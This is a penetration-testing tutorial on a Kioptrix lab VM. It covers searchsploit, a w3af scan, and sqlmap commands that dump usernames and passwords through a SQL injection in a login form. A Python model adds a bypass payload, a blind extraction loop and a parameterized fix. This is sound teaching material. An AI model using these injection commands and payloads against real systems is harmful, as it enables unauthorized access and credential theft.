Vulnerability exploitation in penetration testing
1. Search for vulnerabilities in the target system
The previous article in this penetration testing series described how to collect information about the target system. This article takes one of the Kioptrix virtual machines as an example and shows how a discovered vulnerability is exploited.
On exploit-db.com it is usually possible to find details of known vulnerabilities together with proof-of-concept (PoC) code that demonstrates them. The PoC helps you understand the principle and mechanism of a vulnerability, so that you can verify whether it actually affects your target and whether the existing protection measures work as intended.
2. Offline vulnerability Library
Kali Linux ships with an offline copy of the Exploit Database in /usr/share/exploitdb. Use the searchsploit command to search it:
# searchsploit samba
This lists the known exploits for various Samba versions. None of them matches version 3.0.28a, which the last scan in the previous chapter identified on the target's Samba server. In that case, search for the vulnerability online or update the local copy of the database (searchsploit -u); this is not covered here.
3. Use the w3af Tool
w3af is a powerful web vulnerability scanner. The following describes how to use it. Enter w3af_gui in a Kali Linux terminal to start the graphical version.
In the Scan config panel, select the full_audit profile and enable the bruteforce plugin, enter the target URL in the Target address bar, and click Start to begin the scan.
The scanner's log can be viewed in the Log tab.
The Results tab shows the findings. Some are marked in red, including sqli (SQL injection) and clickjacking. These are the candidates for exploitation; a scanner finding is only a hypothesis until it has been confirmed manually, which is what the next section does for the SQL injection.
4. Use sqlmap for SQL Injection
1) Use sqlmap to enumerate the database behind the login form.
# sqlmap -u http://192.168.50.102/checklogin.php --data "mypassword=1"
Note: the login at 192.168.50.102 is submitted with POST, so the form fields go in the --data option; sqlmap tests each parameter given there for injection.
Use the following command to list all databases:
# sqlmap -u http://192.168.50.102/checklogin.php --data "mypassword=1" --dbs
List the tables in the members database:
# sqlmap -u http://192.168.50.102/checklogin.php --data "mypassword=1" -D members --tables
List the columns of the members table:
# sqlmap -u http://192.168.50.102/checklogin.php --data "mypassword=1" -D members -T members --columns
Dump the contents of the username and password columns:
# sqlmap -u http://192.168.50.102/checklogin.php --data "mypassword=1" -D members -T members -C username,password --dump
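The following is an added example, not code from the original article or from the Kioptrix VM. It models the login handler that the sqlmap commands above attack, so that the mechanism behind the --dump step can be seen end to end: a query built by string concatenation, the classic authentication bypass, a boolean-based blind extraction loop of the kind sqlmap uses when the page echoes nothing back, and the parameterized query that closes the hole. The database name members, table members and columns username/password come from the commands above; the rows, the in-memory SQLite database (standing in for MySQL) and the SQLite functions unicode()/substr() (where sqlmap would use MySQL's ord()/mid()) are assumptions of this example.

```python
"""Model of a checklogin.php-style login and its exploitation.

Added example; not the article's or Kioptrix's code. Uses sqlite3 so it
runs offline. The row contents are constructed sample data.
"""
import sqlite3

# Constructed sample rows (assumption, not data from a real target).
SAMPLE_ROWS = [("admin", "5afac8d85f"), ("john", "66lajGGbla")]


def make_db():
    """Create the assumed 'members' table in an in-memory SQLite database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.executemany("INSERT INTO members VALUES (?, ?)", SAMPLE_ROWS)
    return con


def vulnerable_login(con, myusername, mypassword):
    """The pattern sqlmap exploits: POST fields concatenated into the SQL.

    Returns True when the login 'succeeds' (at least one row matched)."""
    sql = ("SELECT username FROM members WHERE username='%s' "
           "AND password='%s'" % (myusername, mypassword))
    return con.execute(sql).fetchone() is not None


def safe_login(con, myusername, mypassword):
    """Hardened form: the values travel as bound parameters, never as SQL."""
    sql = "SELECT username FROM members WHERE username=? AND password=?"
    return con.execute(sql, (myusername, mypassword)).fetchone() is not None


def blind_extract(oracle, subquery, maxlen=32):
    """Boolean-based blind extraction.

    'oracle' takes an injected username value and returns True/False
    (logged in or not). Each probe asks whether character 'pos' of the
    subquery result equals code point 'c'; the trailing '-- ' comments
    out the rest of the original WHERE clause. Stops when no character
    matches, i.e. past the end of the string."""
    out = ""
    for pos in range(1, maxlen + 1):
        for c in range(32, 127):  # printable ASCII
            payload = "x' OR unicode(substr((%s),%d,1))=%d-- " % (subquery, pos, c)
            if oracle(payload):
                out += chr(c)
                break
        else:
            break
    return out


def run_demo():
    """Run the three scenarios and return their results for inspection."""
    con = make_db()
    bypass_payload = "admin'-- "  # closes the quote, comments out the password check
    oracle = lambda injected_user: vulnerable_login(con, injected_user, "1")
    admin_pw = blind_extract(
        oracle, "SELECT password FROM members WHERE username='admin'")
    return {
        "vulnerable_bypass": vulnerable_login(con, bypass_payload, "anything"),
        "safe_bypass": safe_login(con, bypass_payload, "anything"),
        "safe_valid": safe_login(con, "admin", "5afac8d85f"),
        "extracted_admin_password": admin_pw,
    }


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(k, "=", v)
```

The oracle passes the injection through the username field and a fixed value through mypassword; sqlmap does the same thing automatically for every parameter in --data, and the column-by-column --dump above is this extraction loop run over every row of the table. Note that the parameterized version rejects the bypass string but still accepts the real credentials, which is the check to make after deploying a fix.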